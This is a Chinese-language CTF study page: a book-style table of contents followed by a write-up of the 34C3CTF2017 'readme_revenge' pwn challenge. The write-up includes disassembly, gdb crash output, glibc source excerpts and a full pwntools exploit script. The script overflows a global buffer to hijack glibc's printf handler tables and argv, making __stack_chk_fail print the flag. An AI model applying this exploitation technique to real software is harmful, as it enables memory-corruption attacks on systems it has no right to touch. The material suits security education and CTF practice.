- 简介
- 一、基础知识篇
- 二、工具篇
- 三、分类专题篇
- 四、技巧篇
- 五、高级篇
- 六、题解篇
- 6.1 Pwn
- 6.1.1 pwn HCTF2016 brop
- 6.1.2 pwn NJCTF2017 pingme
- 6.1.3 pwn XDCTF2015 pwn200
- 6.1.4 pwn BackdoorCTF2017 Fun-Signals
- 6.1.5 pwn GreHackCTF2017 beerfighter
- 6.1.6 pwn DefconCTF2015 fuckup
- 6.1.7 pwn 0CTF2015 freenote
- 6.1.8 pwn DCTF2017 Flex
- 6.1.9 pwn RHme3 Exploitation
- 6.1.10 pwn 0CTF2017 BabyHeap2017
- 6.1.11 pwn 9447CTF2015 Search-Engine
- 6.1.12 pwn N1CTF2018 vote
- 6.1.13 pwn 34C3CTF2017 readme_revenge
- 6.1.14 pwn 32C3CTF2015 readme
- 6.1.15 pwn 34C3CTF2017 SimpleGC
- 6.1.16 pwn HITBCTF2017 1000levels
- 6.1.17 pwn SECCONCTF2016 jmper
- 6.1.18 pwn HITBCTF2017 Sentosa
- 6.1.19 pwn HITBCTF2018 gundam
- 6.1.20 pwn 33C3CTF2016 babyfengshui
- 6.1.21 pwn HITCONCTF2016 Secret_Holder
- 6.1.22 pwn HITCONCTF2016 Sleepy_Holder
- 6.1.23 pwn BCTF2016 bcloud
- 6.1.24 pwn HITCONCTF2016 HouseofOrange
- 6.1.25 pwn HCTF2017 babyprintf
- 6.1.26 pwn 34C3CTF2017 300
- 6.1.27 pwn SECCONCTF2016 tinypad
- 6.1.28 pwn ASISCTF2016 b00ks
- 6.1.29 pwn Insomni'hackteaserCTF2017 TheGreatEscapepart-3
- 6.1.30 pwn HITCONCTF2017 Ghostinthe_heap
- 6.1.31 pwn HITBCTF2018 mutepig
- 6.1.32 pwn SECCONCTF2017 vmnofun
- 6.1.33 pwn 34C3CTF2017 LFA
- 6.1.34 pwn N1CTF2018 memsafety
- 6.1.35 pwn 0CTF2018 heapstorm2
- 6.1.36 pwn NJCTF2017 messager
- 6.1.37 pwn sixstarctf2018 babystack
- 6.1.38 pwn HITCONCMT2017 pwn200
- 6.1.39 pwn BCTF2018 houseofAtum
- 6.1.40 pwn LCTF2016 pwn200
- 6.1.41 pwn PlaidCTF2015 PlaidDB
- 6.1.42 pwn hacklu2015 bookstore
- 6.1.43 pwn 0CTF2018 babyheap
- 6.1.44 pwn ASIS2017 start_hard
- 6.1.45 pwn LCTF2016 pwn100
- 6.2 Reverse
- 6.3 Web
- 6.1 Pwn
- 七、实战篇
- 7.1 CVE
- 7.1.1 CVE-2017-11543 tcpdump sliplink_print 栈溢出漏洞
- 7.1.2 CVE-2015-0235 glibc _nsshostnamedigitsdots 堆溢出漏洞
- 7.1.3 CVE-2016-4971 wget 任意文件上传漏洞
- 7.1.4 CVE-2017-13089 wget skipshortbody 栈溢出漏洞
- 7.1.5 CVE–2018-1000001 glibc realpath 缓冲区下溢漏洞
- 7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞
- 7.1.7 CVE-2018-6323 GNU binutils elfobjectp 整型溢出漏洞
- 7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞
- 7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞
- 7.1 CVE
- 八、学术篇
- 8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)
- 8.2 Return-Oriented Programming without Returns
- 8.3 Return-Oriented Rootkits: Bypassing Kernel Code Integrity Protection Mechanisms
- 8.4 ROPdefender: A Detection Tool to Defend Against Return-Oriented Programming Attacks
- 8.5 Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks
- 8.7 What Cannot Be Read, Cannot Be Leveraged? Revisiting Assumptions of JIT-ROP Defenses
- 8.9 Symbolic Execution for Software Testing: Three Decades Later
- 8.10 AEG: Automatic Exploit Generation
- 8.11 Address Space Layout Permutation (ASLP): Towards Fine-Grained Randomization of Commodity Software
- 8.13 New Frontiers of Reverse Engineering
- 8.14 Who Allocated My Memory? Detecting Custom Memory Allocators in C Binaries
- 8.21 Micro-Virtualization Memory Tracing to Detect and Prevent Spraying Attacks
- 8.22 Practical Memory Checking With Dr. Memory
- 8.23 Evaluating the Effectiveness of Current Anti-ROP Defenses
- 8.24 How to Make ASLR Win the Clone Wars: Runtime Re-Randomization
- 8.25 (State of) The Art of War: Offensive Techniques in Binary Analysis
- 8.26 Driller: Augmenting Fuzzing Through Selective Symbolic Execution
- 8.27 Firmalice - Automatic Detection of Authentication Bypass Vulnerabilities in Binary Firmware
- 8.28 Cross-Architecture Bug Search in Binary Executables
- 8.29 Dynamic Hooks: Hiding Control Flow Changes within Non-Control Data
- 8.30 Preventing brute force attacks against stack canary protection on networking servers
- 8.33 Under-Constrained Symbolic Execution: Correctness Checking for Real Code
- 8.34 Enhancing Symbolic Execution with Veritesting
- 8.38 TaintEraser: Protecting Sensitive Data Leaks Using Application-Level Taint Tracking
- 8.39 DART: Directed Automated Random Testing
- 8.40 EXE: Automatically Generating Inputs of Death
- 8.41 IntPatch: Automatically Fix Integer-Overflow-to-Buffer-Overflow Vulnerability at Compile-Time
- 8.42 Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software
- 8.43 DTA++: Dynamic Taint Analysis with Targeted Control-Flow Propagation
- 8.44 Superset Disassembly: Statically Rewriting x86 Binaries Without Heuristics
- 8.45 Ramblr: Making Reassembly Great Again
- 8.46 FreeGuard: A Faster Secure Heap Allocator
- 8.48 Reassembleable Disassembling
- 九、附录
6.1.13 pwn 34C3CTF2017 readme_revenge
$ file readme_revenge
readme_revenge: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=2f27d1b57237d1ab23f8d0fc3cd418994c5b443d, not stripped
$ checksec -f readme_revenge
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 3 45 readme_revenge
与我们经常接触的题目不同,这是一个静态链接程序,运行时不需要加载 libc。not stripped 绝对是个好消息。
$ ./readme_revenge
Hi, aaaa. Bye.
$ ./readme_revenge
Hi, %x.%d.%p. Bye.
$ python -c 'print("A"*2000)' > crash_input
$ ./readme_revenge < crash_input
Segmentation fault (core dumped)
$ rabin2 -z readme_revenge | grep 34C3
Warning: Cannot initialize dynamic strings
000 0x000b4040 0x006b4040 35 36 (.data) ascii 34C3_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
看来 flag 是被隐藏在程序中的,地址在 0x006b4040
,位于 .data
段上。结合题目的名字 readme,推测这题的目标应该是从程序中读取或者泄漏出 flag。
因为 flag 在程序的 .data
段上,根据我们的经验,应该能想到利用 __stack_chk_fail()
将其打印出来(参考章节 4.12)。
main 函数如下:
[0x00400900]> pdf @ main
;-- main:
/ (fcn) sym.main 80
| sym.main (int arg_1020h);
| ; arg int arg_1020h @ rsp+0x1020
| ; DATA XREF from 0x0040091d (entry0)
| 0x00400a0d 55 push rbp
| 0x00400a0e 4889e5 mov rbp, rsp
| 0x00400a11 488da424e0ef. lea rsp, [rsp - 0x1020]
| 0x00400a19 48830c2400 or qword [rsp], 0
| 0x00400a1e 488da4242010. lea rsp, [arg_1020h] ; 0x1020
| 0x00400a26 488d35b3692b. lea rsi, obj.name ; 0x6b73e0
| 0x00400a2d 488d3d50c708. lea rdi, [0x0048d184] ; "%s"
| 0x00400a34 b800000000 mov eax, 0
| 0x00400a39 e822710000 call sym.__isoc99_scanf
| 0x00400a3e 488d359b692b. lea rsi, obj.name ; 0x6b73e0
| 0x00400a45 488d3d3bc708. lea rdi, str.Hi___s._Bye. ; 0x48d187 ; "Hi, %s. Bye.\n"
| 0x00400a4c b800000000 mov eax, 0
| 0x00400a51 e87a6f0000 call sym.__printf
| 0x00400a56 b800000000 mov eax, 0
| 0x00400a5b 5d pop rbp
\ 0x00400a5c c3 ret
很简单,从标准输入读取字符串到变量 name
,地址在 0x6b73e0
,且位于 .bss
段上,是一个全局变量。接下来程序调用 printf 将 name
在 gdb 里试试:
gdb-peda$ r < crash_input
Starting program: /home/firmy/Desktop/RE4B/readme/readme_revenge < crash_input
Program received signal SIGSEGV, Segmentation fault.
RAX: 0x4141414141414141 ('AAAAAAAA')
RBX: 0x7fffffffd190 --> 0xffffffff
RCX: 0x7fffffffd160 --> 0x0
RDX: 0x73 ('s')
RSI: 0x0
RDI: 0x48d18b ("%s. Bye.\n")
RBP: 0x0
RSP: 0x7fffffffd050 --> 0x0
RIP: 0x45ad64 (<__parse_one_specmb+1300>: cmp QWORD PTR [rax+rdx*8],0x0)
R8 : 0x48d18b ("%s. Bye.\n")
R9 : 0x4
R10: 0x48d18c ("s. Bye.\n")
R11: 0x7fffffffd160 --> 0x0
R12: 0x0
R13: 0x7fffffffd190 --> 0xffffffff
R14: 0x48d18b ("%s. Bye.\n")
R15: 0x1
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
0x45ad53 <__parse_one_specmb+1283>: jmp 0x45ab95 <__parse_one_specmb+837>
0x45ad58 <__parse_one_specmb+1288>: nop DWORD PTR [rax+rax*1+0x0]
0x45ad60 <__parse_one_specmb+1296>: movzx edx,BYTE PTR [r10]
=> 0x45ad64 <__parse_one_specmb+1300>: cmp QWORD PTR [rax+rdx*8],0x0
0x45ad69 <__parse_one_specmb+1305>: je 0x45a944 <__parse_one_specmb+244>
0x45ad6f <__parse_one_specmb+1311>: lea rdi,[rsp+0x8]
0x45ad74 <__parse_one_specmb+1316>: mov rsi,rbx
0x45ad77 <__parse_one_specmb+1319>: addr32 call 0x44cfa0 <__handle_registered_modifier_mb>
0000| 0x7fffffffd050 --> 0x0
0008| 0x7fffffffd058 --> 0x48d18c ("s. Bye.\n")
0016| 0x7fffffffd060 --> 0x0
0024| 0x7fffffffd068 --> 0x0
0032| 0x7fffffffd070 --> 0x7fffffffd5e0 --> 0x7fffffffdb90 --> 0x7fffffffdc80 --> 0x4014a0 (<__libc_csu_init>: push r15)
0040| 0x7fffffffd078 --> 0x7fffffffd190 --> 0xffffffff
0048| 0x7fffffffd080 --> 0x7fffffffd190 --> 0xffffffff
0056| 0x7fffffffd088 --> 0x443153 (<printf_positional+259>: mov r14,QWORD PTR [r12+0x20])
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000045ad64 in __parse_one_specmb ()
gdb-peda$ x/8gx &name
0x6b73e0 <name>: 0x4141414141414141 0x4141414141414141
0x6b73f0 <name+16>: 0x4141414141414141 0x4141414141414141
0x6b7400 <_dl_tls_static_used>: 0x4141414141414141 0x4141414141414141
0x6b7410 <_dl_tls_max_dtv_idx>: 0x4141414141414141 0x4141414141414141
程序的漏洞很明显了,就是缓冲区溢出覆盖了 libc 静态编译到程序里的一些指针。再往下看会发现一些可能有用的:
0x6b7978 <__libc_argc>: 0x4141414141414141
0x6b7980 <__libc_argv>: 0x4141414141414141
0x6b7a28 <__printf_function_table>: 0x4141414141414141
0x6b7a30 <__printf_modifier_table>: 0x4141414141414141
0x6b7aa8 <__printf_arginfo_table>: 0x4141414141414141
0x6b7ab0 <__printf_va_arg_table>: 0x4141414141414141
gdb-peda$ bt
#0 0x000000000045ad64 in __parse_one_specmb ()
#1 0x0000000000443153 in printf_positional ()
#2 0x0000000000446ed2 in vfprintf ()
#3 0x0000000000407a74 in printf ()
#4 0x0000000000400a56 in main ()
#5 0x0000000000400c84 in generic_start_main ()
#6 0x0000000000400efd in __libc_start_main ()
#7 0x000000000040092a in _start ()
依次调用了 printf() => vfprintf() => printf_positional() => __parse_one_specmb()
。那就看一下 glibc 源码,然后发现了这个:
// stdio-common/vfprintf.c
/* Use the slow path in case any printf handler is registered. */
if (__glibc_unlikely (__printf_function_table != NULL
|| __printf_modifier_table != NULL
|| __printf_va_arg_table != NULL))
goto do_positional;
// stdio-common/printf-parsemb.c
/* Get the format specification. */
spec->info.spec = (wchar_t) *format++;
spec->size = -1;
if (__builtin_expect (__printf_function_table == NULL, 1)
|| spec->info.spec > UCHAR_MAX
|| __printf_arginfo_table[spec->info.spec] == NULL
/* We don't try to get the types for all arguments if the format
uses more than one. The normal case is covered though. If
the call returns -1 we continue with the normal specifiers. */
|| (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])
(&spec->info, 1, &spec->data_arg_type,
&spec->size)) < 0)
这里就涉及到 glibc 的一个特性,它允许用户为 printf 的模板字符串(template strings)定义自己的转换函数,方法是使用函数 register_printf_function()
// stdio-common/printf.h
extern int register_printf_function (int __spec, printf_function __func,
printf_arginfo_function __arginfo)
__THROW __attribute_deprecated__;
- 该函数为指定的字符
。 __func
想一下,在程序的 main 函数中,使用 %s
调用了 printf
,如果我们能重新定义一个转换规则,就能做利用 __func
做我们想做的事情。然而我们并不能直接调用 register_printf_function()
。那么,如果利用溢出修改 __printf_function_table
其实也就是 __register_printf_specifier()
// stdio-common/reg-printf.c
/* Register FUNC to be called to format SPEC specifiers. */
__register_printf_specifier (int spec, printf_function converter,
printf_arginfo_size_function arginfo)
if (spec < 0 || spec > (int) UCHAR_MAX)
__set_errno (EINVAL);
return -1;
int result = 0;
__libc_lock_lock (lock);
if (__printf_function_table == NULL)
__printf_arginfo_table = (printf_arginfo_size_function **)
calloc (UCHAR_MAX + 1, sizeof (void *) * 2);
if (__printf_arginfo_table == NULL)
result = -1;
goto out;
__printf_function_table = (printf_function **)
(__printf_arginfo_table + UCHAR_MAX + 1);
__printf_function_table[spec] = converter;
__printf_arginfo_table[spec] = arginfo;
__libc_lock_unlock (lock);
return result;
然后发现 spec
被直接用做数组 __printf_function_table
和 __printf_arginfo_table
也就是 0x73
,这和我们在 gdb 里看到的相符:rdx=0x73
正好是数组取值的方式,虽然这里的 rax
里保存的是 __printf_modifier_table
有了上面的分析,下面我们来构造 exp。
回顾一下 __parse_one_specmb()
函数里的 if
判断语句,我们知道 C 语言对 ||
的处理机制是如果第一个表达式为 True,就不再进行第二个表达式的判断,所以为了执行函数 *__printf_arginfo_table[spec->info.spec]
,需要前面的判断条件都为 False。我们可以在 .bss
段上伪造一个 printf_arginfo_size_function
结构体,在结构体偏移 0x73*8
的地方放上 __stack_chk_fail()
的地址,当该函数执行时,将打印出 argv[0]
指向的字符串,所以我们还需要将 argv[0]
覆盖为 flag 的地址。
$ python2 exp.py
[+] Starting local process './readme_revenge': pid 14553
[*] Switching to interactive mode
*** stack smashing detected ***: 34C3_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX terminated
完整的 exp 如下:
from pwn import *
io = process('./readme_revenge')
flag_addr = 0x6b4040
name_addr = 0x6b73e0
argv_addr = 0x6b7980
func_table = 0x6b7a28
arginfo_table = 0x6b7aa8
stack_chk_fail = 0x4359b0
payload = p64(flag_addr) # name
payload = payload.ljust(0x73 * 8, "\x00")
payload += p64(stack_chk_fail) # __printf_arginfo_table[spec->info.spec]
payload = payload.ljust(argv_addr - name_addr, "\x00")
payload += p64(name_addr) # argv
payload = payload.ljust(func_table - name_addr, "\x00")
payload += p64(name_addr) # __printf_function_table
payload = payload.ljust(arginfo_table - name_addr, "\x00")
payload += p64(name_addr) # __printf_arginfo_table
# with open("./payload", "wb") as f:
# f.write(payload)
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